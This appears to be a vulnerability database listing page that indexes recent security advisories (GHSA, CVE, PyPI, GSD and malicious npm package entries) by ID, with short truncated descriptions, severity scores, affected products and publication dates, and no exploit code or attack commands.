Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ghsa-jf9v-fxfq-wm76 Lift Sensitive Information Disclosure 2022-05-17T05:07:19Z 2025-09-30T19:18:03Z
ghsa-ww3v-6xjf-jv28 Uncontrolled Resource Consumption in Spray JSON 2022-06-28T23:23:20Z 2025-09-30T19:11:48Z
ghsa-55vq-xpjf-r2xc Lightbend Alpakka Kafka logs credentials on debug level 2023-04-27T21:30:26Z 2025-09-30T18:53:16Z
ghsa-gpx4-37g2-c8pv Argo CD Unauthenticated Remote DoS via malformed Azure DevOps git.push webhook 2025-09-30T18:32:31Z 2025-09-30T18:32:31Z
ghsa-x5c4-2c4m-rfj5 Rapid7 AppSpider Pro versions below 7.5.021 suffer from a project name validation vulnerability, wh… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-x284-mqwh-m8wm Dify v1.6.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component contro… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-wr4m-f8q9-97q2 NiceHash QuickMiner 6.12.0 perform software updates over HTTP without validating digital signatures… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-jwvx-8mrf-4v7m The EKEN video doorbell T6 BT60PLUS_MAIN_V1.0_GC1084_20230531 periodically sends debug logs to the … 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-j4g5-gmc2-6cfx An SQL injection vulnerability in user-login.php and index.php of Karthikg1908 Hospital Management … 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-g829-2387-h324 A flaw was found in Red Hat Openshift AI Service. A low-privileged attacker with access to an authe… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-cv3h-v6fc-4549 NVIDIA Delegated Licensing Service for all appliance platforms contains a SQL injection vulnerabili… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-cphw-5rrj-wrrh NVIDIA Delegated Licensing Service for all appliance platforms contains a vulnerability where an Us… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-9965-vmph-33xx A URL validation bypass vulnerability exists in validator.js through version 13.15.15. The isURL() … 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-83v7-hfmf-x8c4 NVIDIA Delegated Licensing Service for all appliance platforms contains a vulnerability where an Us… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-6339-mv7f-5fgx SourceCodester Web-based Pharmacy Product Management System V1.0 is vulnerable to Cross Site Script… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-5xqv-9pr8-p6mp A security flaw in the '_transfer' function of a smart contract implementation for Money Making Opp… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-5xq5-7xh5-4jv6 There is a memory corruption vulnerability due to an out of bounds read in DefaultFontOptions() whe… 2025-09-30T18:30:25Z 2025-09-30T18:30:25Z
ghsa-whc9-qqp7-r44w There is a memory corruption vulnerability due to an out of bounds write in XML_Serialize() when us… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-vm59-52f9-r52r A privilege escalation flaw from host to domain administrator was found in FreeIPA. This vulnerabil… 2025-09-30T15:30:30Z 2025-09-30T18:30:24Z
ghsa-vgh5-4jjp-4pmh TitanSystems Zender v3.9.7 contains an account takeover vulnerability in its password reset functio… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-ph37-2cqr-gfc5 Improper handling of authentication requests lead to a user enumeration vector in the passkey authe… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-fm22-g2q9-j3pw Improper handling of input could lead to an XSS vector in the checkAttribute method of the input fi… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-f8r4-mf27-rf7m Finance.js v4.1.0 contains a Denial of Service (DoS) vulnerability via the IRR function’s depth par… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-6cwx-42hw-w69c An improper access control vulnerability in FormCms v0.5.4 in the /api/schemas/history/[schemaId] e… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-5q7q-p8pc-782h An issue in finance.js v.4.1.0 allows a remote attacker to cause a denial of service via the seekZe… 2025-09-30T18:30:24Z 2025-09-30T18:30:24Z
ghsa-qf47-cq5r-x3c3 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability … 2025-02-25T15:34:37Z 2025-09-30T18:30:21Z
ghsa-5gjj-p5jq-f47g Path Traversal vulnerability in CodeManas Search with Typesense allows Path Traversal. This issue a… 2025-02-25T15:34:37Z 2025-09-30T18:30:21Z
ghsa-m99q-jrwg-59cj The Treck TCP/IP stack before 6.0.1.66 has an IPv4 Integer Underflow. 2022-05-24T17:20:44Z 2025-09-30T18:30:19Z
ghsa-8cmf-w78x-mr9c An issue was discovered in Treck IPv6 before 6.0.1.68. Improper Input Validation in the IPv6 compon… 2022-05-24T17:37:05Z 2025-09-30T18:30:19Z
ghsa-85jh-9232-5897 The EnvíaloSimple: Email Marketing y Newsletters plugin for WordPress is vulnerable to Cross-Site R… 2024-04-09T21:31:59Z 2025-09-30T18:30:19Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2025-56392 N/A An Insecure Direct Object Reference (IDOR) in the… n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T19:49:16.527Z
cve-2025-56018 N/A SourceCodester Web-based Pharmacy Product Managem… n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T19:48:16.760Z
cve-2025-58008 6.5 (v3.1) WordPress Participants Database Plugin <= 2.7.6.3 - Cr… xnau webdesign
Participants Database
2025-09-22T18:24:10.219Z 2025-09-30T19:45:00.138Z
cve-2025-52047 N/A In Frappe ErpNext v15.57.5, the function get_inco… n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T19:43:47.741Z
cve-2025-52043 N/A In Frappe ERPNext v15.57.5, the function import_c… n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T19:42:37.445Z
cve-2025-36262 4.9 (v3.1) IBM Planning Analytics Local information disclosure IBM
Planning Analytics Local
2025-09-30T19:42:37.033Z 2025-09-30T19:42:37.033Z
cve-2025-52050 N/A In Frappe ERPNext 15.57.5, the function get_loyal… n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T19:41:37.443Z
cve-2025-36132 5.4 (v3.1) IBM Planning Analytics Local cross-site scripting IBM
Planning Analytics Local
2025-09-30T19:41:19.912Z 2025-09-30T19:41:19.912Z
cve-2025-52049 N/A In Frappe ErpNext v15.57.5, the function get_time… n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T19:37:58.497Z
cve-2025-56200 N/A A URL validation bypass vulnerability exists in v… n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T19:36:11.737Z
cve-2025-56675 The EKEN video doorbell T6 BT60PLUS_MAIN_V1.0_GC1… EKEN
video doorbell T6
2025-09-30T00:00:00.000Z 2025-09-30T19:32:42.572Z
cve-2025-9230 Out-of-bounds read & write in RFC 3211 KEK Unwrap OpenSSL
OpenSSL
2025-09-30T13:17:00.808Z 2025-09-30T19:30:29.803Z
cve-2025-28016 N/A A Reflected Cross-Site Scripting (XSS) vulnerabil… n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T19:29:13.883Z
cve-2025-9231 Timing side-channel in SM2 algorithm on 64 bit ARM OpenSSL
OpenSSL
2025-09-30T13:17:12.007Z 2025-09-30T19:28:28.380Z
cve-2024-55017 N/A Account Takeover in Corezoid 6.6.0 in the OAuth2 … n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T19:27:55.072Z
cve-2025-41095 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS)
BOLD Workplanner
2025-09-30T11:15:55.509Z 2025-09-30T19:25:16.750Z
cve-2025-41096 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS)
BOLD Workplanner
2025-09-30T11:16:31.984Z 2025-09-30T19:24:49.948Z
cve-2025-41094 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS)
BOLD Workplanner
2025-09-30T11:14:33.108Z 2025-09-30T19:24:40.970Z
cve-2025-41097 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS)
BOLD Workplanner
2025-09-30T11:16:55.358Z 2025-09-30T19:24:28.801Z
cve-2025-41099 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS)
BOLD Workplanner
2025-09-30T11:17:30.044Z 2025-09-30T19:24:03.057Z
cve-2025-41098 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS)
BOLD Workplanner
2025-09-30T11:18:20.965Z 2025-09-30T19:23:33.563Z
cve-2025-41093 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS)
BOLD Workplanner
2025-09-30T11:13:48.555Z 2025-09-30T19:22:52.080Z
cve-2025-9232 Out-of-bounds read in HTTP client no_proxy handling OpenSSL
OpenSSL
2025-09-30T13:17:19.172Z 2025-09-30T19:22:35.483Z
cve-2025-41092 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS)
BOLD Workplanner
2025-09-30T11:12:59.221Z 2025-09-30T19:21:12.468Z
cve-2025-41091 7.1 (v4.0) Insecure Direct Object Reference in GPS BOLD Workplanner GLOBAL PLANNING SOLUTIONS S.L (GPS)
BOLD Workplanner
2025-09-30T11:10:49.088Z 2025-09-30T19:18:22.090Z
cve-2025-8122 8.7 (v4.0) Blind SQL Injection in PAD CMS Polska Akademia Dostępności
PAD CMS
2025-09-30T10:05:21.046Z 2025-09-30T19:16:36.187Z
cve-2025-8121 8.7 (v4.0) Blind SQL Injection in PAD CMS Polska Akademia Dostępności
PAD CMS
2025-09-30T10:05:13.295Z 2025-09-30T19:15:53.681Z
cve-2025-8120 10 (v4.0) Remote Code Execution via Unrestricted File Upload in … Polska Akademia Dostępności
PAD CMS
2025-09-30T10:05:03.496Z 2025-09-30T19:15:27.470Z
cve-2025-8119 5.1 (v4.0) Cross-Site Request Forgery in PAD CMS Polska Akademia Dostępności
PAD CMS
2025-09-30T10:04:54.900Z 2025-09-30T19:14:50.548Z
cve-2025-8118 6.9 (v4.0) Bruteforce Protection Bypass in PAD CMS Polska Akademia Dostępności
PAD CMS
2025-09-30T10:04:46.284Z 2025-09-30T19:14:22.705Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2025-25968 N/A DDSN Interactive cm3 Acora CMS version 10.1.1 con… n/a
n/a
2025-02-20T00:00:00.000Z 2025-02-20T19:43:14.160Z
cve-2025-47790 Nextcloud Server doesn't request second factor after s… nextcloud
security-advisories
2025-05-16T14:02:57.806Z 2025-05-16T14:51:08.989Z
cve-2025-47794 Nextcloud Server vulnerable to insecure temporary file… nextcloud
security-advisories
2025-05-16T14:35:25.280Z 2025-05-16T14:48:34.016Z
cve-2025-27566 3.8 (v3.1) 5.1 (v4.0) Path traversal vulnerability exists in a-blog cms… appleple inc.
a-blog cms
2025-05-19T08:09:26.427Z 2025-05-19T14:42:50.286Z
cve-2025-32999 5.4 (v3.1) 4.8 (v4.0) Cross-site scripting vulnerability exists in a-bl… appleple inc.
a-blog cms
2025-05-19T08:08:51.815Z 2025-05-19T15:28:40.444Z
cve-2025-56132 N/A LiquidFiles filetransfer server is vulnerable to … n/a
n/a
2025-09-30T00:00:00.000Z 2025-09-30T18:49:21.225Z
cve-2025-43827 5.3 (v4.0) Insecure Direct Object Reference (IDOR) vulnerabi… Liferay
Portal
2025-09-30T18:57:54.351Z 2025-09-30T18:57:54.351Z
cve-2025-11149 This affects all versions of the package node-sta… n/a
node-static
2025-09-30T05:00:07.700Z 2025-09-30T19:07:09.035Z
cve-2025-11148 All versions of the package check-branches are vu… n/a
check-branches
2025-09-30T05:00:06.332Z 2025-09-30T19:06:21.373Z
cve-2024-1297 10 (v3.1) Loomio 2.22.0 - Code injection Loomio
Loomio
2024-02-19T23:41:47.207Z 2025-09-30T19:10:07.621Z
cve-2025-36560 8.6 (v3.1) 9.2 (v4.0) Server-side request forgery vulnerability exists … appleple inc.
a-blog cms
2025-05-19T08:08:00.732Z 2025-05-19T15:45:37.691Z
cve-2021-45688 N/A An issue was discovered in the ash crate before 0… n/a
n/a
2021-12-26T21:51:47 2024-08-04T04:47:02.011Z
cve-2025-41429 4.8 (v3.1) 2.1 (v4.0) a-blog cms multiple versions neutralize logs impr… appleple inc.
a-blog cms
2025-05-19T08:07:38.068Z 2025-05-19T15:46:29.408Z
cve-2024-41476 N/A AMTT Hotel Broadband Operation System (HiBOS) V3.… n/a
n/a
2024-08-09T00:00:00 2024-08-10T14:37:22.044Z
cve-2025-47850 4.3 (v3.1) In JetBrains YouTrack before 2025.1.74704 restric… JetBrains
YouTrack
2025-05-20T17:37:43.234Z 2025-05-20T17:51:14.017Z
cve-2025-1716 5.3 (v4.0) picklescan - Security scanning bypass via 'pip main' mmaitre314
picklescan
2025-02-26T14:51:38.085Z 2025-03-03T15:58:37.163Z
cve-2025-48391 7.7 (v3.1) In JetBrains YouTrack before 2025.1.76253 deletio… JetBrains
YouTrack
2025-05-20T17:37:42.265Z 2025-05-20T17:51:27.480Z
cve-2022-28224 Calico and Calico Enterprise may be vulnerable to rout… Tigera
Calico Enterprise
2022-06-06T17:19:12.810566Z 2024-09-16T20:31:41.256Z
cve-2025-6276 Brilliance Golden Link Secondary System rentTakeInfoPa… Brilliance
Golden Link Secondary System
2025-06-19T20:00:12.445Z 2025-06-23T19:30:21.538Z
cve-2025-6277 Brilliance Golden Link Secondary System custTakeInfoPa… Brilliance
Golden Link Secondary System
2025-06-19T20:29:32.333Z 2025-06-23T19:30:16.622Z
cve-2025-55230 7.8 (v3.1) Windows MBT Transport Driver Elevation of Privilege Vu… Microsoft
Windows 10 Version 1809
2025-08-21T19:49:44.447Z 2025-09-17T17:52:11.374Z
cve-2025-6282 xlang-ai OpenAgents file.py create_upload_file path tr… xlang-ai
OpenAgents
2025-06-19T22:00:16.250Z 2025-06-23T19:29:48.205Z
cve-2025-55229 5.3 (v3.1) Windows Certificate Spoofing Vulnerability Microsoft
Windows 10 Version 1809
2025-08-21T19:50:40.421Z 2025-09-17T17:53:04.856Z
cve-2024-35591 N/A An arbitrary file upload vulnerability in O2OA v8… n/a
n/a
2024-05-24T13:50:27.504Z 2025-02-13T15:59:06.165Z
cve-2025-6283 xataio Xata Agent route.ts GET path traversal xataio
Xata Agent
2025-06-19T22:31:07.828Z 2025-06-23T19:29:42.982Z
cve-2025-6365 HobbesOSR Kitten pgtable.h set_pte_at resource consumption HobbesOSR
Kitten
2025-06-20T20:31:06.583Z 2025-06-23T15:18:08.528Z
cve-2025-6498 HTACG tidy-html5 alloc.c defaultAlloc memory leak HTACG
tidy-html5
2025-06-23T01:31:05.868Z 2025-06-23T13:45:07.073Z
cve-2025-6517 Dromara MaxKey Meta URL SAML20DetailsController.java a… Dromara
MaxKey
2025-06-23T18:00:15.580Z 2025-06-24T13:33:50.343Z
cve-2024-4665 N/A EventPrime – Events Calendar, Bookings and Tickets < 3… Unknown
EventPrime
2025-05-15T20:09:45.830Z 2025-08-27T12:00:22.935Z
cve-2024-8983 N/A Custom Twitter Feeds < 2.2.3 - Admin+ Stored XSS Unknown
Custom Twitter Feeds
2024-10-08T06:00:03.744Z 2025-08-27T12:00:59.283Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
fkie_cve-2024-36911 In the Linux kernel, the following vulnerability has been resolved: hv_netvsc: Don't free decrypte… 2024-05-30T16:15:14.530 2025-09-30T17:57:44.780
fkie_cve-2024-2165 The SEOPress – On-site SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via th… 2024-04-09T19:15:28.763 2025-09-30T17:56:44.110
fkie_cve-2024-2822 A vulnerability, which was classified as problematic, was found in DedeCMS 5.7. This affects an unk… 2024-03-22T17:15:09.093 2025-09-30T17:54:47.697
fkie_cve-2024-36909 In the Linux kernel, the following vulnerability has been resolved: Drivers: hv: vmbus: Don't free… 2024-05-30T16:15:14.380 2025-09-30T17:54:32.430
fkie_cve-2024-41349 unmark 1.9.2 is vulnerable to Cross Site Scripting (XSS) via application/views/marks/add_by_url.php. 2024-08-29T21:15:10.433 2025-09-30T17:52:57.667
fkie_cve-2025-43375 The issue was addressed with improved checks. This issue is fixed in Xcode 26. Processing an overly… 2025-09-15T23:15:39.013 2025-09-30T17:52:42.230
fkie_cve-2024-36908 In the Linux kernel, the following vulnerability has been resolved: blk-iocost: do not WARN if ioc… 2024-05-30T16:15:14.300 2025-09-30T17:51:14.207
fkie_cve-2024-36900 In the Linux kernel, the following vulnerability has been resolved: net: hns3: fix kernel crash wh… 2024-05-30T16:15:13.600 2025-09-30T17:49:17.863
fkie_cve-2024-36880 In the Linux kernel, the following vulnerability has been resolved: Bluetooth: qca: add missing fi… 2024-05-30T16:15:11.640 2025-09-30T17:46:25.843
fkie_cve-2024-36029 In the Linux kernel, the following vulnerability has been resolved: mmc: sdhci-msm: pervent access… 2024-05-30T16:15:11.247 2025-09-30T17:43:52.073
fkie_cve-2024-36026 In the Linux kernel, the following vulnerability has been resolved: drm/amd/pm: fixes a random han… 2024-05-30T15:15:49.577 2025-09-30T17:41:33.853
fkie_cve-2024-36024 In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Disable idle … 2024-05-30T15:15:49.420 2025-09-30T17:39:31.130
fkie_cve-2024-36021 In the Linux kernel, the following vulnerability has been resolved: net: hns3: fix kernel crash wh… 2024-05-30T15:15:49.193 2025-09-30T17:20:03.930
fkie_cve-2025-7493 A privilege escalation flaw from host to domain administrator was found in FreeIPA. This vulnerabil… 2025-09-30T15:15:58.243 2025-09-30T17:15:41.637
fkie_cve-2025-56520 Dify v1.6.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component contro… 2025-09-30T17:15:41.333 2025-09-30T17:15:41.333
fkie_cve-2025-56207 A security flaw in the '_transfer' function of a smart contract implementation for Money Making Opp… 2025-09-30T17:15:41.163 2025-09-30T17:15:41.163
fkie_cve-2024-36018 In the Linux kernel, the following vulnerability has been resolved: nouveau/uvmm: fix addr/range c… 2024-05-30T15:15:48.950 2025-09-30T17:15:40.997
fkie_cve-2025-54476 Improper handling of input could lead to an XSS vector in the checkAttribute method of the input fi… 2025-09-30T16:15:52.280 2025-09-30T17:15:40.927
fkie_cve-2025-20352 A vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco IOS Software an… 2025-09-24T18:15:36.930 2025-09-30T17:15:37.663
fkie_cve-2025-43400 An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in ma… 2025-09-29T18:15:31.620 2025-09-30T17:12:46.563
fkie_cve-2024-10241 Mattermost versions 9.5.x <= 9.5.9 fail to properly filter the channel data when ElasticSearch is e… 2024-10-29T08:15:11.990 2025-09-30T17:09:36.340
fkie_cve-2025-23798 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability … 2025-01-22T15:15:23.873 2025-09-30T17:05:49.347
fkie_cve-2025-26876 Path Traversal vulnerability in CodeManas Search with Typesense allows Path Traversal. This issue a… 2025-02-25T15:15:24.180 2025-09-30T17:05:26.237
fkie_cve-2025-26877 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability … 2025-02-25T15:15:24.380 2025-09-30T17:03:49.237
fkie_cve-2025-28168 The Multiple File Upload add-on component 3.1.0 for OutSystems is vulnerable to Unrestricted File U… 2025-05-05T14:15:28.500 2025-09-30T17:01:40.920
fkie_cve-2025-29088 In SQLite 3.49.0 before 3.49.1, certain argument values to sqlite3_db_config (in the C-language API… 2025-04-10T14:15:27.163 2025-09-30T16:59:27.320
fkie_cve-2024-1587 The Newsmatic theme for WordPress is vulnerable to Sensitive Information Exposure in all versions u… 2024-04-09T19:15:18.580 2025-09-30T16:57:37.430
fkie_cve-2024-1714 An issue exists in all supported versions of IdentityIQ Lifecycle Manager that can result if an ent… 2024-02-21T17:15:09.003 2025-09-30T16:56:44.690
fkie_cve-2024-20332 A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could… 2024-04-03T17:15:48.713 2025-09-30T16:53:58.543
fkie_cve-2024-20345 A vulnerability in the file upload functionality of Cisco AppDynamics Controller could allow an aut… 2024-03-06T17:15:09.973 2025-09-30T16:53:00.220
Vulnerabilities are sorted by update time (recent to old).
ID Description Package Published Updated
pysec-2023-278 MindsDB connects artificial intelligence models to real time data. Versions prior to 23.1… mindsdb 2023-12-11T21:15:00Z 2025-09-24T12:25:35.630454Z
pysec-2024-85 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-09-24T12:06:55.139467Z
pysec-2024-84 Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-09-24T12:06:55.008375Z
pysec-2024-83 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-09-24T12:06:54.875042Z
pysec-2024-82 Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB… mindsdb 2024-09-12T13:15:00Z 2025-09-24T12:06:54.738725Z
pysec-2025-52 gateway_proxy_handler in MLflow before 3.1.0 lacks gateway_path validation. mlflow 2025-06-23T15:15:29Z 2025-08-28T06:24:53.410404Z
pysec-2025-72 The `num2words` project was compromised via a phishing attack and two new versions were u… num2words 2025-07-31T14:34:47+00:00
pysec-2025-71 Cadwyn creates production-ready community-driven modern Stripe-like API versioning in Fas… cadwyn 2025-07-21T21:15:25+00:00 2025-07-23T15:24:03.825615+00:00
pysec-2025-70 A Server-Side Request Forgery (SSRF) vulnerability exists in the RequestsToolkit componen… langchain-community 2025-06-23T21:15:25+00:00 2025-07-16T21:23:40.211079+00:00
pysec-2024-259 In PyTorch <=2.4.1, the RemoteModule has Deserialization RCE. NOTE: this is disputed by m… torch 2024-10-29T21:15:04+00:00 2025-07-16T03:09:57.748865+00:00
pysec-2024-258 In scrapy/scrapy, an issue was identified where the Authorization header is not removed d… scrapy 2024-05-20T08:15:08+00:00 2025-07-15T17:37:50.051730+00:00
pysec-2025-69 In Roundup before 2.5.0, XSS can occur via interaction between URLs and issue tracker tem… roundup 2025-07-13T20:15:25+00:00 2025-07-13T21:23:01.161315+00:00
pysec-2025-68 A vulnerability, which was classified as critical, has been found in Upsonic up to 0.55.6… upsonic 2025-06-19T21:15:27+00:00 2025-07-08T19:22:27.449399+00:00
pysec-2025-67 A vulnerability classified as critical was found in Upsonic up to 0.55.6. This vulnerabil… upsonic 2025-06-19T21:15:27+00:00 2025-07-08T19:22:27.385619+00:00
pysec-2025-66 Improper privilege management in a REST interface allowed registered users to access unau… streampipes 2025-03-03T11:15:11+00:00 2025-07-08T15:23:46.628375+00:00
pysec-2025-65 A path traversal vulnerability exists in run-llama/llama_index versions 0.12.27 through 0… llama-index 2025-07-07T13:15:28+00:00 2025-07-07T15:23:42.730681+00:00
pysec-2025-61 Pillow is a Python imaging library. In versions 11.2.0 to before 11.3.0, there is a heap … pillow 2025-07-01T19:15:27Z 2025-07-07T14:12:46.226030Z
pysec-2025-64 A vulnerability classified as critical has been found in themanojdesai python-a2a up to 0… python-a2a 2025-06-17T07:15:18+00:00 2025-07-02T21:23:13.806273+00:00
pysec-2025-63 vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Whe… vllm 2025-03-19T16:15:32+00:00 2025-07-01T23:22:49.176005+00:00
pysec-2025-62 vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Mal… vllm 2025-02-07T20:15:34+00:00 2025-07-01T23:22:49.083695+00:00
pysec-2025-60 Exposure of Sensitive Information to an Unauthorized Actor, Insertion of Sensitive Inform… apache-iotdb 2025-05-14T11:16:28+00:00 2025-07-01T21:22:47.232036+00:00
pysec-2025-59 Remote Code Execution with untrusted URI of UDF vulnerability in Apache IoTDB. The attack… apache-iotdb 2025-05-14T11:15:47+00:00 2025-07-01T21:22:47.177405+00:00
pysec-2024-257 Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessm… mobsf 2024-03-22T23:15:07+00:00 2025-06-30T15:23:50.085549+00:00
pysec-2025-58 vLLM is a library for LLM inference and serving. vllm/model_executor/weight_utils.py impl… vllm 2025-01-27T18:15:41+00:00 2025-06-27T21:22:36.583615+00:00
pysec-2025-57 A Denial of Service (DoS) vulnerability in zenml-io/zenml version 0.66.0 allows unauthent… zenml 2025-03-20T10:15:48+00:00 2025-06-27T17:22:55.175431+00:00
pysec-2025-56 OctoPrint provides a web interface for controlling consumer 3D printers. In versions up t… octoprint 2025-04-22T18:15:59+00:00 2025-06-27T17:22:53.513680+00:00
pysec-2024-256 Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessm… mobsf 2024-12-03T16:15:24+00:00 2025-06-27T17:22:53.325430+00:00
pysec-2025-55 vLLM is an inference and serving engine for large language models (LLMs). Version 0.8.0 u… vllm 2025-05-30T19:15:30+00:00 2025-06-26T21:23:06.407481+00:00
pysec-2025-54 vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8… vllm 2025-05-30T19:15:30+00:00 2025-06-26T21:23:06.319321+00:00
pysec-2025-53 vLLM is an inference and serving engine for large language models (LLMs). Prior to versio… vllm 2025-05-29T17:15:21+00:00 2025-06-26T21:23:06.231251+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-33884 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33901 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33887 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33895 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33894 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33902 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33888 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33885 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33891 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33899 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33889 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33893 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33892 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33890 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33896 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33903 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33900 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33898 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33886 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33897 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33883 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4303 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4300 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4297 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4301 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4296 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4299 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4302 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4298 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33876 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
mal-2024-11205 Malicious code in @wix-platform/velo-multilingual-helper-backend (npm) 2024-12-05T12:37:46Z 2024-12-05T12:37:46Z
mal-2024-11204 Malicious code in cdp-agentkit-core (npm) 2024-12-05T10:35:51Z 2024-12-05T10:35:51Z
mal-2024-7895 Malicious code in lit-3 (npm) 2024-08-05T18:53:26Z 2024-12-05T09:06:36Z
mal-2024-11203 Malicious code in finn-pulse-init (npm) 2024-12-05T07:58:04Z 2024-12-05T08:07:42Z
mal-2024-11202 Malicious code in buoyant-utils (npm) 2024-12-05T05:57:35Z 2024-12-05T05:57:35Z
mal-2024-11201 Malicious code in coldbox (npm) 2024-12-05T04:54:20Z 2024-12-05T05:06:49Z
mal-2024-11200 Malicious code in quintoandar-jwt (npm) 2024-12-05T00:55:28Z 2024-12-05T00:55:28Z
mal-2024-10914 Malicious code in veworld-mock (npm) 2024-11-24T20:43:19Z 2024-12-05T00:35:15Z
mal-2024-10912 Malicious code in quorumnetworktester (npm) 2024-11-24T18:53:52Z 2024-12-05T00:35:15Z
mal-2024-10911 Malicious code in plaid-tiny-quickstart (npm) 2024-11-24T16:15:48Z 2024-12-05T00:35:15Z
mal-2024-10572 Malicious code in xcasset-gen (npm) 2024-11-08T12:05:36Z 2024-12-05T00:35:15Z
mal-2024-10570 Malicious code in spliffy-benchmark (npm) 2024-11-08T13:58:58Z 2024-12-05T00:35:15Z
mal-2024-10569 Malicious code in quill-icons-park (npm) 2024-11-08T12:25:57Z 2024-12-05T00:35:15Z
mal-2024-10566 Malicious code in pixiv-novel-editor (npm) 2024-11-08T12:13:43Z 2024-12-05T00:35:15Z
mal-2024-10534 Malicious code in sinbad-dev (npm) 2024-11-08T11:45:22Z 2024-12-05T00:35:15Z
mal-2024-2055 Malicious code in d11-foo (npm) 2024-06-25T12:35:11Z 2024-12-05T00:35:14Z
